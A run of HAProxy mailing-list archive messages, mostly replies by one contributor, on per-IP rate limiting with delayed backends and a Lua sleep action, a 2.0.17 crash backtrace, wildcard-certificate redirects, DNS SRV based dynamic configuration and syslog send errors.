>3d69a6029 ("BUG/MINOR: lua: Ignore the reserve to know if a channel is
> full or not")
>
> Do you use some Lua code which would involve the is_full() attribute on
> a channel ?
>
> Willy
>

Unfortunately (in context of figuring out the issue) we are not using lua
:-/
One thing I noticed though was that there was an OCSP file that had landed
by mistake inside the SSL directory HAP is loading the certificates from.
Do you think something like that can cause this to happen over the course
of time? I don't but thought worth mentioning since that was the only diff
I could see from our standard config elsewhere.

Thanks,
Igor


Re: Rate Limit per IP with queueing (delay)

2020-06-08 Thread Igor Cicimov
On Mon, Jun 8, 2020 at 5:18 PM Stefano Tranquillini 
wrote:

>
>
> On Sun, Jun 7, 2020 at 11:11 PM Илья Шипицин  wrote:
>
>>
>>
>> вс, 7 июн. 2020 г. в 19:59, Stefano Tranquillini :
>>
>>> Hello all,
>>>
>>> I'm moving to HA using it to replace NGINX and I've a question regarding
>>> how to do a Rate Limiting in HA that enables queuing the requests instead
>>> of closing them.
>>>
>>> I was able to limit per IP following those examples:
>>> https://www.haproxy.com/blog/four-examples-of-haproxy-rate-limiting/ .
>>> However, when the limit is reached, the users see the error and connection
>>> is closed.
>>>
>>> Since I come from NGINX, it has this handy feature
>>> https://www.nginx.com/blog/rate-limiting-nginx/ where connections that
>>> exceed the threshold are queued. Thus the user will still be able to do the
>>> calls but be delayed without him getting errors and keep the overall number
>>> of requests within threshold.
>>>
>>> Is there anything similar in HA? It should limit/queueing the user by
>>> IP.
>>>
>>> To explain with an example, we have two users Alice, with ip A.A.A.A
>>> and Bob with ip B.B.B.B The threshold is 30r/minute.
>>>
>>> So in 1 minute:
>>>
>>>- Alice does 20 requests. -> that's fine
>>>- Bob does 60 requests. -> the system caps the requset to 30 and
>>>then process the other 30 later on (maybe also adding timeout/delay)
>>>- Alice does 50 request -> the first 40 are fine, the next 10 are
>>>queued.
>>>- Bob does 20 requests -> they are queue after the one above.
>>>
>>> I saw that it can be done in general, by limiting the connections per
>>> host. But this will mean that it's cross IP and thus, if 500 is the limit
>>> - Alice  does 1 call
>>> - Bob does 1000 calls
>>> - Alice does another 1 call
>>> - Alice will be queued, that's not what i would like to have.
>>>
>>> is this possible? Is there anything similar that can be done?
>>>
>>
>> it is not cross IP.  I wish nginx docs would be better on that.
>>
> What do you mean?
> in nginx i do
> limit_req_zone $binary_remote_addr zone=prod:10m rate=40r/m;
> and works
>

What works? I don't see how that helps if both users are behind the same IP
address as only the IP address is taken at the rate limit logic?

>
> first, in nginx terms it is limited by zone key. you can define key using
>> for example $binary_remote_addr$http_user_agent$ssl_client_ciphers
>> that means each unique combination of those parameters will be limited by
>> its own counter (or you can use nginx maps to construct such a zone key)
>>
>> in haproxy you can see and example of
>>
>> # Track client by base32+src (Host header + URL path + src IP)
>> http-request track-sc0 base32+src
>>
>> which also means key definition may be as flexible as you can imagine.
>>
>
> the point is, how can i cap the number of requests for a single user to
> 40r/minute for example? or any number.
>

And the point that others are trying to make is you need to have something
in your request that you can use to distinguish one user from another. Like
Authentication header, JWT token or userID maybe in your query string etc.
Then you can use that "unique" value to build your hash similar to what has
been shown above to create your rate limit table key.


Re: Rate Limit per IP with queueing (delay)

2020-06-09 Thread Igor Cicimov
Modify your frontend from the example like this and let us know what
happens:

frontend proxy
bind *:80
stick-table type ip size 100k expire 15s store http_req_rate(10s)
http-request track-sc0 src table Abuse
use_backend api_delay if { sc_http_req_rate(0) gt 30 }
use_backend api

backend api
server api01 api01:80
server api02 api02:80
server api03 api03:80

backend api_delay
tcp-request inspect-delay 500ms
tcp-request content accept if WAIT_END
server api01 api01:80
server api02 api02:80
server api03 api03:80

Note that as per the sliding window rate limiting from the examples you
said you read this limits each source IP to 30 requests for the last time
period of 30 seconds. That gives you 180 requests per 60 seconds.


On Tue, Jun 9, 2020 at 4:47 PM Stefano Tranquillini 
wrote:

> If both users have the same IP then there's a problem, however, if the IPs
> are different nginx auto-limits the request per minute to the value given.
> i would like to achieve the same functionality in HA, or have a way to cap
> the number of calls per IP (or user or whatever) to a certain number.
> I don't really care if right now it is by IP or User via auth or JWT.
> The problem that I've is with the primitives to define this maximum number
> of calls per minute/seconds etc.
>
>
> On Tue, Jun 9, 2020 at 6:08 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>>
>>
>> On Mon, Jun 8, 2020 at 5:18 PM Stefano Tranquillini 
>> wrote:
>>
>>>
>>>
>>> On Sun, Jun 7, 2020 at 11:11 PM Илья Шипицин 
>>> wrote:
>>>
>>>>
>>>>
>>>> вс, 7 июн. 2020 г. в 19:59, Stefano Tranquillini :
>>>>
>>>>> Hello all,
>>>>>
>>>>> I'm moving to HA using it to replace NGINX and I've a question
>>>>> regarding how to do a Rate Limiting in HA that enables queuing the 
>>>>> requests
>>>>> instead of closing them.
>>>>>
>>>>> I was able to limit per IP following those examples:
>>>>> https://www.haproxy.com/blog/four-examples-of-haproxy-rate-limiting/
>>>>> . However, when the limit is reached, the users see the error and
>>>>> connection is closed.
>>>>>
>>>>> Since I come from NGINX, it has this handy feature
>>>>> https://www.nginx.com/blog/rate-limiting-nginx/ where connections
>>>>> that exceed the threshold are queued. Thus the user will still be able to
>>>>> do the calls but be delayed without him getting errors and keep the 
>>>>> overall
>>>>> number of requests within threshold.
>>>>>
>>>>> Is there anything similar in HA? It should limit/queueing the user by
>>>>> IP.
>>>>>
>>>>> To explain with an example, we have two users Alice, with ip A.A.A.A
>>>>> and Bob with ip B.B.B.B The threshold is 30r/minute.
>>>>>
>>>>> So in 1 minute:
>>>>>
>>>>>- Alice does 20 requests. -> that's fine
>>>>>- Bob does 60 requests. -> the system caps the requset to 30 and
>>>>>then process the other 30 later on (maybe also adding timeout/delay)
>>>>>- Alice does 50 request -> the first 40 are fine, the next 10 are
>>>>>queued.
>>>>>- Bob does 20 requests -> they are queue after the one above.
>>>>>
>>>>> I saw that it can be done in general, by limiting the connections per
>>>>> host. But this will mean that it's cross IP and thus, if 500 is the limit
>>>>> - Alice  does 1 call
>>>>> - Bob does 1000 calls
>>>>> - Alice does another 1 call
>>>>> - Alice will be queued, that's not what i would like to have.
>>>>>
>>>>> is this possible? Is there anything similar that can be done?
>>>>>
>>>>
>>>> it is not cross IP.  I wish nginx docs would be better on that.
>>>>
>>> What do you mean?
>>> in nginx i do
>>> limit_req_zone $binary_remote_addr zone=prod:10m rate=40r/m;
>>> and works
>>>
>>
>> What works? I don't see how that helps if both users are behind the same
>> IP address as only the IP address is taken at the rate limit logic?
>>
>>>
>>> first, in nginx terms it is limited by zone key. you can define key
>>>> using for example $binary_remote_addr$http_user_agent$ssl_client_ciphers
>>&

Re: Rate Limit per IP with queueing (delay)

2020-06-09 Thread Igor Cicimov
On Tue, Jun 9, 2020 at 6:48 PM Stefano Tranquillini 
wrote:

> Hello,
> i didn't really get what has been changed in this example, and why.
>
> On Tue, Jun 9, 2020 at 9:46 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> Modify your frontend from the example like this and let us know what
>> happens:
>>
>> frontend proxy
>> bind *:80
>> stick-table type ip size 100k expire 15s store http_req_rate(10s)
>>
>
> sticky table is now here
>
>
>> http-request track-sc0 src table Abuse
>>
> but this refers to the other one , do I've to keep this? is it better to
> have it here or shared?
>
> use_backend api_delay if { sc_http_req_rate(0) gt 30 }
>>
>
> this is measuring that in the last 10s there are more than 30 requests,
> uses the table in this proxy here, not the abuse
>
>
>> use_backend api
>>
>> backend api
>> server api01 api01:80
>> server api02 api02:80
>> server api03 api03:80
>>
>> backend api_delay
>> tcp-request inspect-delay 500ms
>> tcp-request content accept if WAIT_END
>> server api01 api01:80
>> server api02 api02:80
>> server api03 api03:80
>>
>> Note that as per the sliding window rate limiting from the examples you
>> said you read this limits each source IP to 30 requests for the last time
>> period of 30 seconds. That gives you 180 requests per 60 seconds.
>>
>
> Yes sorry that's typo should had been

frontend proxy
bind *:80
stick-table type ip size 100k expire 15s store http_req_rate(10s)
http-request track-sc0 src
use_backend api_delay if { sc_http_req_rate(0) gt 30 }
use_backend api

> In this example, and what I did before, it seems the same behaviour (or at
> least per my understanding).
> so that, if a user does more than 30 requests in 10 seconds then the rest
> are slowed down by 500ms.
> right?
>
>
Correct.


> it does not really imply that there's a max number of calls per minute. in
> fact, if the users makes 500 calls in parallel from the same IP
>

It implies indirectly, if there are 30 per 10 seconds then there can be a
maximum of 180 per minute.

>
> - the first 30 are executed
> - the other 470 are executed but with a "penalty" of 500s
>
> but that's it. Did i get it correctly?
>

Yes. If they get executed in the same period of 10 seconds. You can play
with the numbers and adjust to your requirements. You can delay them as in
your example or drop them.

Haproxy have more examples in other articles like Bot net protection one
and one about stick tables that I also highly recommend for reading. You
might find some interesting info that can help your case.

>
> --
> *Stefano Tranquillini, *CTO/Co-Founder @ chino.io
> *Need to talk? book a slot <http://bit.ly/2LdXbZQ>*
> *Please consider the environment before printing this email - **keep it
> short <http://five.sentenc.es/> *
>
>
>


Re: Rate Limit per IP with queueing (delay)

2020-06-10 Thread Igor Cicimov
Glad you found a solution that works for you. I personally don't see any
issues with this since lua is lightweight and haproxy is famous for
efficient resource management. So all should be good under "normal" usage
and by normal I mean a traffic and usage pattern you expect from your app
users that non maliciously overstep your given limits. I cannot say what
will happen in case of a real DDOS attack and how much this buffering can
hurt you :-/, you might want to wait for a reply from one of the more
knowledgeable users or the devs.

On Tue, Jun 9, 2020 at 10:38 PM Stefano Tranquillini  wro

> I may have found a solution, that's a bit more elegant (to me)
>
> The idea is to use a lua script to do some weighted sleep depending on
> data.
> the question is: "is this idea good or bad"? especially, will the
> "core.msleep"  have implications on performance for everybody?
> If someone uses all the connections available it will stuck all the users,
> right?
>
> said so, i should cap/limit the number of connections for each user at the
> same time. but that's another story. (i guess i can create an acl with OR
> condition, if it's 30 request in 10 sec or 30 open connections)
> going back to the beginning.
>
> my lua file
>
> function delay_request(txn)
> local number1 = tonumber(txn:get_var('txn.sc_http_req_rate'))
> core.msleep(50 * number1)
> end
>
> core.register_action("delay_request", { "http-req" }, delay_request, 0);
>
> my frontend
>
> frontend proxy
> bind *:80
>
> stick-table type ip size 100k expire 10s store http_req_rate(10s)
> http-request track-sc0 src
> http-request set-var(txn.sc_http_req_rate) sc_http_req_rate(0)
> http-request lua.delay_request if { sc_http_req_rate(0) gt 30 }
> use_backend api
>
> Basically if there are more than 30 request per 10 seconds, i will make
> them wait 50*count (so starting from 1500ms up to whatver they keep
> insisting)
> does it make sense?
> do you see performance problems?
>
> On Tue, Jun 9, 2020 at 11:12 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> On Tue, Jun 9, 2020 at 6:48 PM Stefano Tranquillini 
>> wrote:
>>
>>> Hello,
>>> i didn't really get what has been changed in this example, and why.
>>>
>>> On Tue, Jun 9, 2020 at 9:46 AM Igor Cicimov <
>>> ig...@encompasscorporation.com> wrote:
>>>
>>>> Modify your frontend from the example like this and let us know what
>>>> happens:
>>>>
>>>> frontend proxy
>>>> bind *:80
>>>> stick-table type ip size 100k expire 15s store http_req_rate(10s)
>>>>
>>>
>>> sticky table is now here
>>>
>>>
>>>> http-request track-sc0 src table Abuse
>>>>
>>> but this refers to the other one , do I've to keep this? is it better to
>>> have it here or shared?
>>>
>>> use_backend api_delay if { sc_http_req_rate(0) gt 30 }
>>>>
>>>
>>> this is measuring that in the last 10s there are more than 30 requests,
>>> uses the table in this proxy here, not the abuse
>>>
>>>
>>>> use_backend api
>>>>
>>>> backend api
>>>> server api01 api01:80
>>>> server api02 api02:80
>>>> server api03 api03:80
>>>>
>>>> backend api_delay
>>>> tcp-request inspect-delay 500ms
>>>> tcp-request content accept if WAIT_END
>>>> server api01 api01:80
>>>> server api02 api02:80
>>>> server api03 api03:80
>>>>
>>>> Note that as per the sliding window rate limiting from the examples you
>>>> said you read this limits each source IP to 30 requests for the last time
>>>> period of 30 seconds. That gives you 180 requests per 60 seconds.
>>>>
>>>
>>> Yes sorry that's typo should had been
>>
>> frontend proxy
>> bind *:80
>> stick-table type ip size 100k expire 15s store http_req_rate(10s)
>> http-request track-sc0 src
>> use_backend api_delay if { sc_http_req_rate(0) gt 30 }
>> use_backend api
>>
>>> In this example, and what I did before, it seems the same behaviour (or
>>> at least per my understanding).
>>> so that, if a user does more than 30 requests in 10 seconds then the
>>> rest are slowed down by 500ms.
>>> right?
>>>
>>>
>> Correct.
>>
>>
>>> it does not really imply that 

Dynamic peers section

2020-08-26 Thread Igor Cicimov
Hi guys,

As we know everything is dynamic these days including haproxy servers
coming and going all the time in a proxy/lb tier so wonder if there is any
way to achieve a dynamic peers section in haproxy? Maybe via resolvers or
the data plane API? Interested to know how are people managing this case if
at all possible.

Thanks,
Igor


http2 smuggling

2020-09-10 Thread Igor Cicimov
Should we be worried?

https://portswigger.net/daily-swig/http-request-smuggling-http-2-opens-a-new-attack-tunnel

IC


Re: [2.0.17] crash with coredump

2020-09-16 Thread Igor Cicimov
Hi Maciej,

On Wed, Sep 16, 2020 at 9:00 PM Maciej Zdeb  wrote:

> Hi,
>
> Our HAProxy (2.0.14) started to crash, so first we upgraded to 2.0.17 but
> it didn't help. Below you'll find traces from coredump
>
> Version:
> HA-Proxy version 2.0.17 2020/07/31 - https://haproxy.org/
> Build options :
>   TARGET  = linux-glibc
>   CPU = generic
>   CC  = gcc
>   CFLAGS  = -O0 -g -fno-strict-aliasing -Wdeclaration-after-statement
> -fwrapv -Wno-unused-label -Wno-sign-compare -Wno-unused-parameter
> -Wno-old-style-declaration -Wno-ignored-qualifiers -Wno-clobbered
> -Wno-missing-field-initializers -Wno-implicit-fallthrough
> -Wno-stringop-overflow -Wtype-limits -Wshift-negative-value
> -Wshift-overflow=2 -Wduplicated-cond -Wnull-dereference
> -DIP_BIND_ADDRESS_NO_PORT=24 -DMAX_SESS_STKCTR=12
>   OPTIONS = USE_PCRE=1 USE_PCRE_JIT=1 USE_REGPARM=1 USE_GETADDRINFO=1
> USE_OPENSSL=1 USE_LUA=1 USE_ZLIB=1 USE_DL=1
>
> Feature list : +EPOLL -KQUEUE -MY_EPOLL -MY_SPLICE +NETFILTER +PCRE
> +PCRE_JIT -PCRE2 -PCRE2_JIT +POLL -PRIVATE_CACHE +THREAD -PTHREAD_PSHARED
> +REGPARM -STATIC_PCRE -STATIC_PCRE2 +TPROXY +LINUX_TPROXY +LINUX_SPLICE
> +LIBCRYPT +CRYPT_H -VSYSCALL +GETADDRINFO +OPENSSL +LUA +FUTEX +ACCEPT4
> -MY_ACCEPT4 +ZLIB -SLZ +CPU_AFFINITY +TFO +NS +DL +RT -DEVICEATLAS
> -51DEGREES -WURFL -SYSTEMD -OBSOLETE_LINKER +PRCTL +THREAD_DUMP -EVPORTS
>
> Default settings :
>   bufsize = 16384, maxrewrite = 1024, maxpollevents = 200
>
> Built with multi-threading support (MAX_THREADS=64, default=4).
> Built with OpenSSL version : OpenSSL 1.1.1f  31 Mar 2020
> Running on OpenSSL version : OpenSSL 1.1.1f  31 Mar 2020
> OpenSSL library supports TLS extensions : yes
> OpenSSL library supports SNI : yes
> OpenSSL library supports : TLSv1.0 TLSv1.1 TLSv1.2 TLSv1.3
> Built with Lua version : Lua 5.3.5
> Built with network namespace support.
> Built with transparent proxy support using: IP_TRANSPARENT
> IPV6_TRANSPARENT IP_FREEBIND
> Built with zlib version : 1.2.11
> Running on zlib version : 1.2.11
> Compression algorithms supported : identity("identity"),
> deflate("deflate"), raw-deflate("deflate"), gzip("gzip")
> Built with PCRE version : 8.44 2020-02-12
> Running on PCRE version : 8.44 2020-02-12
> PCRE library supports JIT : yes
> Encrypted password support via crypt(3): yes
>
> Available polling systems :
>   epoll : pref=300,  test result OK
>poll : pref=200,  test result OK
>  select : pref=150,  test result OK
> Total: 3 (3 usable), will use epoll.
>
> Available multiplexer protocols :
> (protocols marked as  cannot be specified using 'proto' keyword)
>   h2 : mode=HTTP   side=FEmux=H2
>   h2 : mode=HTXside=FE|BE mux=H2
> : mode=HTXside=FE|BE mux=H1
> : mode=TCP|HTTP   side=FE|BE mux=PASS
>
> Available services : none
>
> Available filters :
> [SPOE] spoe
> [COMP] compression
> [CACHE] cache
> [TRACE] trace
>
>
> Coredump fragment from thread1:
> (gdb) bt
> #0  0x55cbbf6ed64b in h2s_notify_recv (h2s=0x7f65b8b55130) at
> src/mux_h2.c:783
> #1  0x55cbbf6edbc7 in h2s_close (h2s=0x7f65b8b55130) at
> src/mux_h2.c:921
> #2  0x55cbbf6f9745 in h2s_htx_make_trailers (h2s=0x7f65b8b55130,
> htx=0x7f65a9c34f20) at src/mux_h2.c:5385
> #3  0x55cbbf6fa48e in h2_snd_buf (cs=0x7f65b8c48a40,
> buf=0x7f65d05291b8, count=2, flags=1) at src/mux_h2.c:5694
> #4  0x55cbbf7cdde3 in si_cs_send (cs=0x7f65b8c48a40) at
> src/stream_interface.c:762
> #5  0x55cbbf7ce839 in stream_int_chk_snd_conn (si=0x7f65d0529478) at
> src/stream_interface.c:1145
> #6  0x55cbbf7cc9d6 in si_chk_snd (si=0x7f65d0529478) at
> include/proto/stream_interface.h:496
> #7  0x55cbbf7cd559 in stream_int_notify (si=0x7f65d05294d0) at
> src/stream_interface.c:510
> #8  0x55cbbf7cda33 in si_cs_process (cs=0x55cbca178f90) at
> src/stream_interface.c:644
> #9  0x55cbbf7cdfb1 in si_cs_io_cb (t=0x0, ctx=0x7f65d05294d0, state=1)
> at src/stream_interface.c:817
> #10 0x55cbbf81af32 in process_runnable_tasks () at src/task.c:415
> #11 0x55cbbf740cc0 in run_poll_loop () at src/haproxy.c:2701
> #12 0x55cbbf741188 in run_thread_poll_loop (data=0x1) at
> src/haproxy.c:2840
> #13 0x7f667fbdb6db in start_thread (arg=0x7f65d5556700) at
> pthread_create.c:463
> #14 0x7f667e764a3f in clone () at
> ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
>
> (gdb) bt full
> #0  0x55cbbf6ed64b in h2s_notify_recv (h2s=0x7f65b8b55130) at
> src/mux_h2.c:783
> sw = 0x
> #1  0x55cbbf6edbc7 in h2s_close (h2s=0x7f65b8b55130) at
> src/mux_h2.c:921
> No locals.
> #2  0x55cbbf6f9745 in h2s_htx_make_trailers (h2s=0x7f65b8b55130,
> htx=0x7f65a9c34f20) at src/mux_h2.c:5385
> list = {{n = {ptr = 0x55cbbf88d18c "", len = 0}, v = {ptr =
> 0x7f65a9c34f20 "�?", len = 94333580136844}}, {n = {ptr = 0x7f65d5532410 "
> Oée\177", len = 94333579742112}, v = {ptr = 0x7f65a9c38e78 "�\001", len =
> 140074616573728}}, {n = {
>   pt

Re: Apache Proxypass mimicing ?

2021-02-21 Thread Igor Cicimov
> But if I do some configuration tweaks in "wp-config.php", like adding the
> following two lines :
> define('WP_HOME', 'https://front1.domain.local');
> define('WP_SITEURL', 'https://front1.domain.local');
>
> It seems to work correctly.
>
> It is not an acceptable solution however, as these WP instances will be
> managed by people who are not really tech-savvy.
>
> So I wonder if HAProxy could provide a setup with all the required
> modifications, rewritings, ... allowing both worlds to coexist in a
> transparent way :
> - usable WP site while browsing the "real" URLs from the backend
> - usable WP site while browsing through HAProxy.
>
> Right now WP is my concern, but I am sure this is a reusable "pattern" for
> future needs.
>
> Regards
>

This is a requirement for most apps behind a reverse proxy -- you simply
have to tell the app that it is behind a reverse proxy so it can set
correct links where needed.

In your case if you google for "wordpress behind reverse proxy" I'm sure
you'll get a ton of resources that can point you in the right direction for
your use case like using X-FORWARD headers for example or whatever suits
you.

-- 


Vote for us  as RegTech 
Partner of the Year at the British Bank Awards!







Know Your Customer 
due diligence on demand, powered by intelligent process automation




Blogs   |  LinkedIn 
  |  Twitter 


 




Encompass Corporation UK Ltd  |  
Company No. SC493055  |  Address: Level 3, 33 Bothwell Street, Glasgow, UK, 
G2 6NL

Encompass Corporation Pty Ltd  |  ACN 140 556 896  |  Address: 
Level 10, 117 Clarence Street, Sydney, New South Wales, 2000

This email 
and any attachments is intended only for the use of the individual or 
entity named above and may contain confidential information. 

If you are 
not the intended recipient, any dissemination, distribution or copying of 
this email is prohibited. 

If received in error, please notify us 
immediately by return email and destroy the original message.










Re: rewrite and redirect with haproxy

2016-11-23 Thread Igor Cicimov
On Thu, Nov 24, 2016 at 2:21 PM, Jonathan Opperman 
wrote:

> On Thu, Nov 24, 2016 at 3:59 PM, Jonathan Opperman 
> wrote:
>
>>
>> On Thu, Nov 24, 2016 at 3:28 PM, Michael Ezzell 
>> wrote:
>>
>>> On Nov 23, 2016 20:16, "Jonathan Opperman"  wrote:
>>>
>>> >> my.site.example.net/example.com -> my-site-example-net.example com
>>> >
>>> >
>>> > This, is this do-able? It will be different domains, and different
>>> level sub domains
>>> > but they will utimately end up with using *.example.com *.example2.com
>>> > certificates that terminate on the haproxy server.
>>> >
>>> > http://my.site.example.com/example.com --> http://my-site.example.com
>>> > http://my.other.site.example.com/example.com --> http://my-o
>>> ther-site.example.com
>>>
>>> This can also be done, though it's a little trickier, because you'd need
>>> to match with path_beg or path_reg and then munge the uri with regsub to
>>> remove that and potentially the initial leading slash along with the host
>>> header parts.
>>>
>> Sounds tricky :), wish there was some examples on some haproxy
>> configurations. It would be great if the manual included some
>> more 'tricky' examples like this.
>>
>>> > Thanks for this, i've tested and mine for some reason looks like the
>>> one you suggest
>>> > on the other hand:
>>> >
>>> > * Rebuilt URL to: www.test.1.example.com/
>>>
>>> > < Location: https://www-test-1-example.com.example.com/
>>>
>>> Take a look at my setup again.
>>>
>>> http-request redirect location https://%[hdr(host),regsub(\.e
>>> xample\.com$,),regsub(\.,-,g)].example.com%[capture.req.uri] if {
>>> hdr_reg(host) -i .+\..+\.example\.com$ }
>>>
>>> I believe your problem is here:
>>>
>>> hdr(host),regsub(\.example\.com$,)
>>>
>>> This first regsub needs to match .example.com at the end of the
>>> original host header, and strip it out completely by replacing it with the
>>> empty string that is hiding between , and ) at the end.
>>>
>>> If it doesn't match correctly, it would leave the .example.com in place
>>> and fail in much the way your output illustrates.
>>>
>> You are 100% correct, I had my escape at the wrong place in the domain
>> name, fixed that and works as per your example. Thanks
>> again.
>>
>>
> This only works if I access http
>
> http://www.test.1.example.com/  --> https://www-test-1.example.com/
>
> Fo entering
>
> https://www.test.1.example.com/ --> https://www-test-1.example.com/
>
> doesn't work in the browser, is http-request only applicable for and http
> request and hot https?
>
> In curl it works, but in Chrome/Chromium it comes up with a warning
> Your connection is not private
> As the wilcard cert *.example.com does match https://www.test.1.example.
> com/ as
> the redrict is not working in the browser to https://www-test-1.example.
> com/
> to match the wilcard cert.
>

The wildcard certs work only to 2 level depth, meaning *.example.com covers
www.example.com, domain1.example.com, etc but *not*
www.domain1.something.example.com etc.


Re: Confused with the health check.

2016-11-29 Thread Igor Cicimov
On 29 Nov 2016 10:11 pm, "顏靖軒"  wrote:
>
> Hello lists
>
> I have a question about the health check.
> After setting the health check, I get error messages usually.
> The message is "Broken pipe at initial connection step of tcp-check".
> What does it mean?

The connection was interrupted by something and no reply was received by
haproxy. Any firewall?

> My server is not dead and keeps running.
> I don't think there is a network problem either.
>
> Thanks


Re: dynamic configuration via DNS SRV records

2016-12-18 Thread Igor Cicimov
On Mon, Dec 19, 2016 at 11:43 AM, jerry  wrote:

> Hi,
>
> We use haproxy quite a but at soundhound for fronting our various external
> and internal services. We are i the process of moving to a container based
> deployment model. With kubernetes in particular, it's as easy as editing 1
> line to add a new server to a replication set. In one of our applications,
> we have 50+ partitions, so when a new instance is added, it  is actually
> 50+ containers and 50+ proxy configs to edit. Clearly we need to automate
> this more than we have so far.
>
> I was looking around at how to do this and came up with an unusual idea.
> Everybody uses DNS, but almost no one uses/knows about SRV records. SRV
> records have the form of
> _(service)._(protocol).name and return a target DNS name (like CNAME),
> priority, weight and destination port. This is like MX records on steroids.
>

For SRV records specifically, I'm using Consul and dnsmasq so on the
haproxy instances I can do:

$ dig +short srv tomcat.service.consul
1 1 8080 ip-192.168-0-45.node.dc-prod.consul.
1 1 8080 ip-192.168-1-226.node.dc-prod.consul.

and update the appropriate backend section of the config file and reload in
case of changes. I keep the config file "modular" meaning multiple parts
(mostly for the backends) that I can update based on some criteria and then
glue together to create the final haproxy.cfg. How do you implement the
updates, the triggers and the config file setup depends on your
architecture and needs.

If you google for "consul-template + haproxy" I'm sure you will also come
across several solutions.

The dynamic DNS update is coming to haproxy in version 1.7, check this
discussion for details
https://www.mail-archive.com/haproxy@formilux.org/msg23579.html


>
> This seems to have everything I need for the dynamic parts of a
> configuration. The original name defines the port to listen on (this can be
> a name that gets looked up in /etc/services or _31112 for a hard port
> number). The set of records returned is the backend set. The ones that have
> the lowest priority are active and the rest are backups. If you want to do
> per backend commands, those can be put in as TXT records for the name
> backend.system.name._(service)._(protocol).name. Similarly, dynamic parts
> of the frontend and backend could be done with TXT records for _frontend
> and _backend prefixes to the SRV name.
>
> For now, we can assume that there is only one level of backup rather than
> the arbitrary number that DNS allows.
>
> There is an extra little bit that DNS can do for us. DNS has a notify
> capability. When a zone updates, the dns server can notify it's slaves with
> the new SOA record. It turns out that all you need to do is generate a
> response that is almost an exact copy of the query you got, in DNS wire
> form to make DNS happy and then do the lookups again.
>
> My thought is that the typical thing you configure for a given proxy would
> remain in the config file as now (what to check, connection mode...). The
> front end becomes the SRV name and the backend is either empty of have some
> command that says expand the SRV record and put it as the backends.
>
>
>
> The reason I like it is there are 75 different orchestration/automation
> systems that could want to drive haproxy. They all talk to DNS already.
> With this, there is a single interface that I need for the automation from
> the view of both an orchestration system and haproxy. We have a custom load
> balancer that we plan to drive the same way.
>
>
> Here are my questions:
> Do people think this is a interesting/good idea?
> Is there anything that is missing and would make this a terrible idea?
> If not fatally flawed, should this be run outside of haproxy as an
> automation tool or should haproxy do this itself?
>
> thanks,
> jerry
>
>
>


-- 
Igor Cicimov | DevOps


p. +61 (0) 433 078 728
e. ig...@encompasscorporation.com <http://encompasscorporation.com/>
w*.* www.encompasscorporation.com
a. Level 4, 65 York Street, Sydney 2000


ALERT:sendmsg logger #1 failed: Resource temporarily unavailable (errno=11)

2017-01-04 Thread Igor Cicimov
Hi all,

On one of my haproxy's I get the following message on reload:

[ALERT] 004/070949 (21440) : sendmsg logger #1 failed: Resource temporarily
unavailable (errno=11)

Has anyone seen this before or any pointers where to look for to correct
this?

Thanks,
Igor


Re: ALERT:sendmsg logger #1 failed: Resource temporarily unavailable (errno=11)

2017-01-05 Thread Igor Cicimov
On Fri, Jan 6, 2017 at 12:37 AM, Jeff Palmer  wrote:

> Also, it'd be great if in the future you don't put an error message as
> the subject.  Especially one that starts with ALERT in all caps.
>
> I'm sure I'm not the only person who just spent a moment looking over
> my monitoring dashboards to figure out what part of my network was in
> alarm.
>
>
>
> On Thu, Jan 5, 2017 at 8:20 AM, Patrick Hemmer 
> wrote:
> >
> >
> > On 2017/1/5 02:15, Igor Cicimov wrote:
> >
> > Hi all,
> >
> > On one of my haproxy's I get the following message on reload:
> > [ALERT] 004/070949 (21440) : sendmsg logger #1 failed: Resource
> temporarily
> > unavailable (errno=11)
> >
> > Has anyone seen this before or any pointers where to look for to correct
> > this?
> >
> > Thanks,
> > Igor
> >
> > Google has several entries on the subject:
> > https://bugs.launchpad.net/kolla/+bug/1549753
> > http://comments.gmane.org/gmane.comp.web.haproxy/4716
> >
> > -Patrick
>
>
>
> --
> Jeff Palmer
> https://PalmerIT.net
>

You are right Jeff, sorry for that I just copy-pasted the error quickly
without thinking much about it. At least I'm sure it got everyone’s
attention though lol

Cheers,
Igor


Re: ALERT:sendmsg logger #1 failed: Resource temporarily unavailable (errno=11)

2017-01-05 Thread Igor Cicimov
On Fri, Jan 6, 2017 at 12:20 AM, Patrick Hemmer 
wrote:

>
>
> On 2017/1/5 02:15, Igor Cicimov wrote:
>
> Hi all,
>
> On one of my haproxy's I get the following message on reload:
>
>
>[ALERT]
> 004/070949 (21440) : sendmsg logger #1 failed: Resource temporarily
> unavailable (errno=11)
>
> Has anyone seen this before or any pointers where to look for to correct
> this?
>
> Thanks,
> Igor
>
> Google has several entries on the subject:
> https://bugs.launchpad.net/kolla/+bug/1549753
> http://comments.gmane.org/gmane.comp.web.haproxy/4716
>
> -Patrick
>

Thanks Patrick I'll have a look.

Igor


Re: ALERT:sendmsg logger #1 failed: Resource temporarily unavailable (errno=11)

2017-01-05 Thread Igor Cicimov
On Fri, Jan 6, 2017 at 1:38 PM, Igor Cicimov  wrote:

>
>
> On Fri, Jan 6, 2017 at 12:20 AM, Patrick Hemmer 
> wrote:
>
>>
>>
>> On 2017/1/5 02:15, Igor Cicimov wrote:
>>
>> Hi all,
>>
>> On one of my haproxy's I get the following message on reload:
>>
>>
>>[ALERT]
>> 004/070949 (21440) : sendmsg logger #1 failed: Resource temporarily
>> unavailable (errno=11)
>>
>> Has anyone seen this before or any pointers where to look for to correct
>> this?
>>
>> Thanks,
>> Igor
>>
>> Google has several entries on the subject:
>> https://bugs.launchpad.net/kolla/+bug/1549753
>> http://comments.gmane.org/gmane.comp.web.haproxy/4716
>>
>> -Patrick
>>
>
> Thanks Patrick I'll have a look.
>
> Igor
>

Increasing the /proc/sys/net/unix/max_dgram_qlen size and restarting
rsyslog fixed the issue for me. Thanks again.

Igor


Re: Two tiered haproxy setup and managing queues and back pressure

2017-02-15 Thread Igor Cicimov
On 15 Feb 2017 7:59 pm, "Juho Mäkinen"  wrote:

We have a setup which requires us to have two haproxy tiers so that first
forwards connections to the second. What I want to know is the theory how
(and why) I should tune my maxconn, backlog and timeout settings to handle
queues overloads and back pressure in situations where my backends are
overloaded.

Think an array of virtual called A, which size is between 10-20. Then
another array B which size is 100-200. There is a client in the A servers
which want to connect to a random worker in array B.

Each machine in B contains a haproxy which will have a single listen clause
with backends which are pointed to workers in the same host. This means
that all connections to a worker in a host in the array B will go through
the haproxy in that host.

